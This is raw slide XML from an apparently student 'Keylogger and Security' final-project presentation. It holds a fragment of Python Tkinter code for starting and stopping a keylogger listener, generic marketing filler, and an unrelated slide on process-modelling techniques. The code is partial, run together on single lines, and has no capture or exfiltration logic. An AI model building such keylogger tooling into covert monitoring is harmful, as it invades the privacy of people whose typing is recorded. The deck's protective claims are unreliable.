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notesSlides/notesSlide13.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611"/>
    <p:restoredTop sz="94610"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="-564" y="-84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2592"/>
        <p:guide pos="4608"/>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10</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11</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12</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13</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The key focus of this project is to develop a comprehensive keylogger and security solution. • This solution will provide a range of features and capabilities to help protect users and their devices. • The main objectives are to outline the core features of the solution and explain the key benefits it can deliver. • I'll dive into each of these areas in more detail to give you a full understanding of what this solution can do. • This overview sets the stage for the rest of the presentation, where I'll go into the specifics of the solution's functionality and how it can help address security challenges.
</a:t>
            </a:r>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8</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns=""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3323273"/>
            <a:ext cx="7415927" cy="493752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3888"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2430" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>VASIM SUBAHANI S</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2430" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4063841"/>
            <a:ext cx="7415927" cy="1064657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Final Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956400" y="5194450"/>
            <a:ext cx="6870243" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"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Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   KEYLOGGER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN"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Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN"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Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Sitka Small Semibold"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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2053233" y="529947"/>
            <a:ext cx="10523934" cy="1661636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6542"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5234" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>YOUR SOLUTION AND ITS VALUE PROPOSITION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5234" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2053233" y="2480548"/>
            <a:ext cx="10523934" cy="5218986"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1107"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043708" y="2480548"/>
            <a:ext cx="10542984" cy="5218986"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236351" y="2624971"/>
            <a:ext cx="10157698" cy="4930140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    global listener listener.stop() label.config(text="Keylogger stopped.")           </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    start_button.config(state='normal') stop_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>root = Tk() root.title("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.') label.config(anchor=CENTER) label.pack()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(side=LEFT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled') stop_button.pack(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>("250x250</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2427"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1517" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1517"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30996"/>
            <a:ext cx="5486400" cy="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="1147524"/>
            <a:ext cx="7415927" cy="3193971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>THE WOW IN YOUR SOLUTION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4711779"/>
            <a:ext cx="7415927" cy="2370296"/>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Our innovative solution offers a unique approach to addressing keylogging threats and security challenges. By leveraging cutting-edge technology and a deep understanding of user behavior, we have developed a comprehensive solution that not only protects against these threats, but also provides a seamless and intuitive user experience.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944"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33532" y="1073229"/>
            <a:ext cx="4525328" cy="565666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="4454"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3563" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>MODELLING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633532" y="1910358"/>
            <a:ext cx="7876937" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Effective business process modelling is a critical step in understanding and optimizing organizational workflows. It allows us to visually represent the key steps, inputs, and outputs of a process, enabling better analysis, communication, and continuous improvement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633532" y="3163610"/>
            <a:ext cx="2710577" cy="282773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2227"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1782" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>10 Powerful Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1782" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="3627358"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Flowcharts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="3980259"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>BPMN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="4333161"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Value Stream Mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="4686062"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Swimlane Diagrams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="5038963"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
